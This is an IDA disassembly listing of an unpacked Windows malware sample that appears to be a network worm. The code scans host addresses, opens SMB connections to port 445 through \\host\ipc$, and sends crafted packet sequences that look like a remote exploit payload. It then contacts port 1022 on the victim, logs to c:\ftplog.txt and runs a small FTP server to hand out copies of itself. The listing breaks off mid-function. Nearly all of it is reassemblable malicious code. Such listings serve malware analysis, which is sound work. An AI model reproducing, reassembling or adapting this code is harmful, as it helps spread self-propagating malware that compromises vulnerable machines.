;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 159C856AD49812762CE088F47A227B5A
; File Name : u:\work\159c856ad49812762ce088f47a227b5a_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40126C+7C�p
; sub_401F4B:loc_401FC9�p ...
mov eax, ds:dword_4070C0
imul eax, 343FDh
add eax, 279EC3h
mov ds:dword_4070C0, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_4020D9+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_4070C0, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_4020D9+11�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call ds:dword_405104 ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call ds:dword_405134 ; inet_addr
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40126C+9C�p
; sub_401F4B+3E�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call ds:dword_40512C ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call ds:dword_405138 ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call ds:dword_405130 ; inet_ntoa
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call ds:dword_405018 ; lstrcpy
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F4B+137�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call ds:dword_40511C ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4022A0
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call ds:dword_405120 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_405124 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call ds:dword_405128 ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40126C+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call ds:dword_405134 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call ds:dword_405138 ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401B59+2B5�p
arg_0 = dword ptr 4
inc ds:dword_4070C4
push esi
push 0
push offset aCFtplog_txt ; "c:\\ftplog.txt"
call ds:dword_405028 ; _lcreat
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40126A
push ebx
push edi
push 2
push 0
push esi
call ds:dword_405024 ; _llseek
push [esp+0Ch+arg_0]
call sub_402300
mov edi, ds:dword_405020
pop ecx
push eax
push [esp+10h+arg_0]
push esi
call edi ; _hwrite
mov ebx, offset asc_406A0C ; "\r\n"
push ebx
call sub_402300
pop ecx
push eax
push ebx
push esi
call edi ; _hwrite
push esi
call ds:dword_40501C ; _lclose
pop edi
pop ebx
loc_40126A: ; CODE XREF: sub_401210+19�j
pop esi
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40126C proc near ; CODE XREF: sub_401A69+7B�p
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_10], 2
push 3FEh
call ds:dword_40511C ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4022A0
add esp, 10h
push 6
push 1
push 2
call ds:dword_405120 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012D1
xor al, al
jmp loc_401379
; ---------------------------------------------------------------------------
loc_4012D1: ; CODE XREF: sub_40126C+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_405124 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401370
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_4070C8
push eax
call ds:dword_405018 ; lstrcpy
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push ds:off_406030
lea eax, [ebp+var_33C]
push eax
call ds:dword_4050F0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402300
add esp, 1Ch
test eax, eax
jbe short loc_401362
loc_40133E: ; CODE XREF: sub_40126C+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call ds:dword_405118 ; send
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402300
cmp esi, eax
pop ecx
jb short loc_40133E
loc_401362: ; CODE XREF: sub_40126C+D0�j
push 3E8h
call ds:dword_40502C ; Sleep
mov bl, 1
pop esi
loc_401370: ; CODE XREF: sub_40126C+75�j
push edi
call ds:dword_405128 ; closesocket
mov al, bl
loc_401379: ; CODE XREF: sub_40126C+60�j
pop edi
pop ebx
leave
retn
sub_40126C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40137D proc near ; CODE XREF: sub_401A69+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_4070C8
push [ebp+arg_4]
call ds:dword_405018 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050F0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013B6: ; CODE XREF: sub_40137D+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013B6
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402380
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402300
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402380
add esp, 2Ch
push [ebp+arg_0]
call ds:dword_405138 ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401539
push edi
push 1
push 2
call ds:dword_405120 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401539
push 1BDh
loc_401493: ; DATA XREF: .text:off_4065D8�o
mov [ebp+var_14], 2
call ds:dword_40511C ; htons
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4022A0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call ds:dword_405124 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401539
mov ebx, ds:dword_405118
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401539
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, ds:dword_405114
call esi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401539
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40153D
loc_401539: ; CODE XREF: sub_40137D+F2�j
; sub_40137D+10B�j ...
xor eax, eax
jmp short loc_40157E
; ---------------------------------------------------------------------------
loc_40153D: ; CODE XREF: sub_40137D+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401555: ; CODE XREF: sub_40137D+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call ds:dword_4050F0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401555
push [ebp+arg_0]
call ds:dword_405128 ; closesocket
push 1
pop eax
loc_40157E: ; CODE XREF: sub_40137D+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_40137D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401583 proc near ; CODE XREF: sub_401A69+3B�p
; sub_401A69+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4026C0
mov eax, ds:dword_406A3C
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, ds:dword_406A40
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050F0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015BD: ; CODE XREF: sub_401583+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015BD
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402380
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402300
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402380
add esp, 2Ch
push 3FEh
call ds:dword_40511C ; htons
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402380
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_4016FF
cmp ebx, 2
jz short loc_4016FF
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4022A0
mov esi, offset loc_406034
push esi
call sub_402300
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402380
lea eax, [ebp+var_14]
push eax
call sub_402300
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402380
add esp, 2Ch
imul ebx, 3Ch
mov eax, ds:dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017D3
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401583+115�j
; sub_401583+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4022A0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402380
mov esi, offset loc_406034
push esi
call sub_402300
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402380
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A34
push eax
call sub_402380
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402380
add esp, 40h
push esi
call sub_402300
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402380
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_40178B: ; CODE XREF: sub_401583+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_40178B
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4022A0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4022A0
add esp, 18h
loc_4017D3: ; CODE XREF: sub_401583+177�j
push 0
push 1
push 2
call ds:dword_405120 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A62
push 1BDh
mov [ebp+var_24], 2
call ds:dword_40511C ; htons
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4022A0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call ds:dword_405124 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A62
mov esi, ds:dword_405118
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A62
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, ds:dword_405114
call edi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019A0
cmp [ebp+arg_4], 2
jz short loc_4019A0
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402380
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402380
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402380
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A43
; ---------------------------------------------------------------------------
loc_4019A0: ; CODE XREF: sub_401583+3B8�j
; sub_401583+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402380
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402380
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402380
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402380
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402380
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A43: ; CODE XREF: sub_401583+418�j
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 3E8h
call ds:dword_40502C ; Sleep
push [ebp+var_4]
call ds:dword_405128 ; closesocket
loc_401A62: ; CODE XREF: sub_401583+264�j
; sub_401583+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_401583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A69 proc near ; CODE XREF: sub_4020D9+27�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_40137D
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401AEA
lea eax, [ebp+var_84]
push offset dword_406A48
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401AAD
push 0
push esi
call sub_401583
push 0
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AAD: ; CODE XREF: sub_401A69+36�j
lea eax, [ebp+var_84]
push offset dword_406A44
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401AD0
push 1
push esi
call sub_401583
push 1
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AD0: ; CODE XREF: sub_401A69+59�j
push 2
push esi
call sub_401583
push 2
loc_401ADA: ; CODE XREF: sub_401A69+42�j
; sub_401A69+65�j
push esi
call sub_401583
add esp, 10h
push esi
call sub_40126C
pop ecx
loc_401AEA: ; CODE XREF: sub_401A69+1F�j
pop esi
leave
retn
sub_401A69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AED proc near ; CODE XREF: sub_40219B+DA�p
; sub_40219B+E6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_40500C ; RegOpenKeyA
test eax, eax
jnz short loc_401B19
push [ebp+arg_8]
push [ebp+arg_4]
call ds:dword_405010 ; RegDeleteValueA
push [ebp+arg_4]
call ds:dword_405000 ; RegCloseKey
loc_401B19: ; CODE XREF: sub_401AED+15�j
pop ebp
retn
sub_401AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B1B proc near ; CODE XREF: sub_401F4B+126�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404DA2 ; IcmpCreateFile
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D9C ; IcmpSendEcho
test eax, eax
jnz short loc_401B4D
or eax, 0FFFFFFFFh
jmp short loc_401B56
; ---------------------------------------------------------------------------
loc_401B4D: ; CODE XREF: sub_401B1B+2B�j
push esi
call sub_404D96 ; IcmpCloseHandle
mov eax, [ebp+var_1C]
loc_401B56: ; CODE XREF: sub_401B1B+30�j
pop esi
leave
retn
sub_401B1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B59 proc near ; DATA XREF: sub_401EC0+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E84
push esi
push edi
push 0
push ds:off_4068D0
call sub_402300
mov esi, ds:dword_405118
pop ecx
push eax
push ds:off_4068D0
push ebx
call esi ; send
mov edi, [ebp+arg_0]
jmp short loc_401B97
; ---------------------------------------------------------------------------
loc_401B94: ; CODE XREF: sub_401B59+31A�j
mov ebx, [ebp+arg_0]
loc_401B97: ; CODE XREF: sub_401B59+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call ds:dword_405114 ; recv
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401BE8
push 0
push ds:off_4068D4
call sub_402300
pop ecx
push eax
push ds:off_4068D4
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401BE8: ; CODE XREF: sub_401B59+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401C19
push 0
push ds:off_4068D8
call sub_402300
pop ecx
push eax
push ds:off_4068D8
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401C19: ; CODE XREF: sub_401B59+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz loc_401CF5
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402810
mov ax, ds:word_406A68
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402770
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C68: ; CODE XREF: sub_401B59+159�j
test ebx, ebx
jz short loc_401C9C
cmp edi, 4
jge short loc_401C7F
push ebx
call sub_401E8B
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C7F: ; CODE XREF: sub_401B59+116�j
